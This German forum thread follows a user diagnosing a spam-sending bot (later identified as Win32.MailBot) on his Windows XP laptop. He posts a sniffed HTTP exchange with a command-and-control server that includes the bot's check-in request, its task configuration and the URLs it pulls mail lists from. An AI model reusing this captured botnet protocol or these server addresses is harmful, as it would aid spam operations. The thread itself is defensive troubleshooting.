Hilfe: Rechner versendet automatisch Mails !!!

Hi ,

seit ca. zwei Tagen versendet mein Rechner offenbar Mails.

Ich dachte dabei sofort an einen Virus, Tojaner oder so. Aber so einfach ist das nicht.

Mit einem Sniffer habe ich mal nachgeschaut.

1.) Mein System versucht ca. alle 180 Sekunden die IP Adresse: 64.62.243.62 zu erreichen.
2.) Von dort werden über HTTP eMail Listen und Nachrichten geladen. Hier mal ein Auszug aus dem Sniff:

-------------------snip-----------
POST /cgi-bin/login.pl HTTP/1.1
Host: ftp.quotes-info.cc
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Connection: Close

file=Speed=+112969%0D%0AOS=+Microsoft+Windows+XP+Service+Pack+2%0D%0AId=+3A48D147BA52B464FC8F2B4BD20D94B8%0D%0AVer=+23%0D%0A1Š
HTTP/1.1 200 OK
Content-Length: 530
Content-Type: text/plain
Server: mailware.embedded/0.9

TaskId=Goodz 1of3-43b46658
Magic=43b68b3e-000a6434-4a3e32fc
Threads=7
CpyCountMin=0
CpyCountMax=0
AnyDomain=0
WithErrors=0
Verify=0
ConnectTimeout=20
SMTPTimeout=20
DataTimeout=30
Maillist=http://64.62.243.62/GetDoze?magic=43b68b3e-000a6434-4a3e32fc
MailText=http://64.62.243.62/GetBody?magic=43b68b3e-000a6434-4a3e32fc
BadStrings=http://64.62.243.62/files/bad.txt
UnluckyStrings=http://64.62.243.62/files/unlucky.txt
FilesURL=http://64.62.243.62/files/
FilesNames=domains.txt,first.txt,last.txt1

-------------------snip-----------

3.) Danach werden dann diese Mails scheinen dann versendet.

Bisher half nur das Blocken der IP Adresse in meinem DSL Router.

Aber wer oder was versendet diese Mails von meinem System und woher kommt der Dreck?

Alle Tool: AntiVir, HiJack, A2, die Microsoft Tools, oder Spybot haben nichts gefunden.

Aber das System Sendet.

Irgend eine Idee?

Ach so, habe hier ein XP Prof. mit SP2, allen MS Patches, Firefox 1.5 und aktiven AntiVir Scanner. Da wird mir schon unheimlich.

 

Na und?

Ja, Virus mit eigener SMTP-Engine. Dein Rechner scheint zu einer Spamschleuder mutiert zu sein. Ihh, geh weg

EDIT: Die IP taucht im Zusammenhang mit einer Webseite im Ostblock (genauer: Ungarn) auf.

 

Hi steppl,

danke für Deinen hilfreichen Hinweis.

Das auf meinem System eine von mir nicht gewollte SMTP-Engine läuft hatte ich bereits in meiner Frage beschrieben. (Siehe 3.))

Ich würde die aber gern wieder vom System kicken, kann Sie aber nicht finden.

Dazu eine Idee?

Ciao
tz_redfox

 

@steppl
wenn ich die ip adresse suche komme ich nach
MarketPostTower datacenter, San Jose, CA, USA
und nicht nach ungarn!!!
außer er benutzt den als proxi
hier die dazugehörige webadresse zu der ip:
http://mccolo.com/english/ ist der horster von 64.62.243.62

 

deinem vorgehen nach zu urteilen traue ich dir zu "merkwürdige" prozesse im taskmanager zu finden. daher tippe ich einfach mal auf ein rootkit, das den mailbot tarnt. wer weiss was sich da sonst noch alles eingenistet hat...

ich würde daher zur neuinstallation raten

 

Hi,ich wollte nicht aufgeben und habe es gefunden.

Nach endlosen Versuchen habe ich ein Tool gefunden, welches meinen Schädling erkennen konnte.

Der Schädling war:

Win32.MailBot.b und oder Win32.MailBot.q

leider konnte ich dazu keine weitere Beschreibung finden.

Obwohl anderen "MailScanner" diesen ebenfalls erkennen sollten, z.b. "AntiVir" haben sie es nicht getan. Erst "ewido anti-malware" (http://www.ewido.net) hatte den Schädling gefunden und konnte ihn aus meinen System löschen.


Ciao
tz_redfox

 

hello,

wie kommt man auf sowas?
ich meine, hat die firewall dir das gemeldet oder woher hast du das bemerkt?

ich will mit der frage versuchen zu klären, was ein user macht der nicht so bewandert ist....

mg

 

Wenn man einen Volumentarif hat, merkt man es an der Rechnung..

 

japp,

aber er hats ja nach 2 tagen gemerkt.
insofern ist das wissen darum interessant, zumal nicht jeder so glücklich ist nen volumentarif zu haben.
soll ja auch n paar arme shweine geben, die mit ner flat arbeiten.

also hier nochmal meine fragen:

f1: wie hast du die infizierung bemerkt?

und spasseshalber noch

f2: wie hast du dir das eingefangen?

grussle

mg

 

Hi michag,

es handelte sich um meinen Laptop und da habe ich einen USB WLAN Adapter für meinen Internetzugang.

Gemerkt habe ich es daran, dass die LED am USB Adapter wie wild blinkte, ohne dass ein Program gestartet war.

Hatte dann die offenen TCP Verbindungeen überprüft und siehe da, lauter ausgehende zu mir unbekannten Adressen. (aports.exe)


Danach einmal mit einem Sniffer (Ethereal) den Trafic mitgeschnitten und drübergeschaut.

Es war also mehr Zufall als Absicht.

Wie das Teil auf mein System gelangt ist, bleibt mir weiterhin unklar. Bisher war ich immer auf Sicherheit bedacht. Alle Patches einspielen, unbekannte Mail werden sowieso gleich gelöscht und die Datenbank meines Virenscanner ist nie älter als eine Woche und doch, irgend wie hatte ich mir das Ding eingefangen.

Ich werde mir wohl doch mal eine Partition mit Linux zum Surfen einrichten.

Ciao
tz_redfox

 

danke für deine ausführungen...


ich finde es wichtig mal so nen "erfahrungsbericht" zu lesen.
man denkt ja immer man ist "geschützt", aber wenn ich sowas lese...

ich geh mal davon aus, dass du einigermassen vorsichtig bist/warst...

man lernt eben nie aus

mg